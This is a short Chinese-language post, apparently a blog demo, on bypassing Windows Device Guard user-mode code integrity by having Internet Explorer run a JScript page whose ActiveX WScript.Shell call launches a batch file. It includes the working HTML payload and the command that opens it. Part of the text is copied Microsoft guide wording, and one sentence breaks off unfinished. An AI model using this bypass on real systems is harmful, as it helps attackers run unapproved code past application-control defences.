
概念验证漏洞利用程序,演示如何在 Internet Explorer 中利用 JScript 和 ActiveX 绕过 UMCI,从而执行任意二进制文件,目标针对 Windows Device Guard 代码完整性策略。
Windows Defender Device Guard 是一系列与企业相关的硬件和软件安全功能的组合,当它们一起配置时,将锁定设备,使其只能运行你在代码完整性策略中定义的受信任应用程序。如果应用不受信任,它就无法运行,仅此而已。配合满足基本要求的硬件,这也意味着即使攻击者设法控制了 Windows 内核,他也很难运行恶意可执行代码。配合合适的硬件,Windows Defender Device Guard 可以利用 Windows 10(在 Enterprise 和 Education 桌面 SKU 以及所有 Server SKU 中可用)中新的基于虚拟化的安全性,将代码完整性服务与 Microsoft Windows 内核本身隔离开来。在这种情况下,代码完整性服务与内核一起在 Windows 虚拟机监控程序保护的容器中运行。 本指南探讨了 Windows Defender Device Guard 中的各个功能,以及如何规划、配置和部署它们。内容包括:
UMCI 阻止未经批准的二进制文件执行,限制 Windows 脚本宿主,并将 PowerShell 置于约束语言模式。这使得在系统上获得代码执行变得相当具有挑战性。这篇文章将
======================================================================||>
让我们来看一个代码绕过演示
======================================================================||>
<html>
<body>
<script type="text/jscript">
var r = new ActiveXObject("WScript.Shell").Run("empire.bat");
</script>
</body>
</html>
======================================================================||>
PS:> C:\Users\Homjxie> cmd /C "C:\Program Files\Internet Explorer\iexplore.exe " "C:\Users\Homjxie\Desktop\Homjxie.html"
======================================================================||>

======================================================================||> ======================================================================||>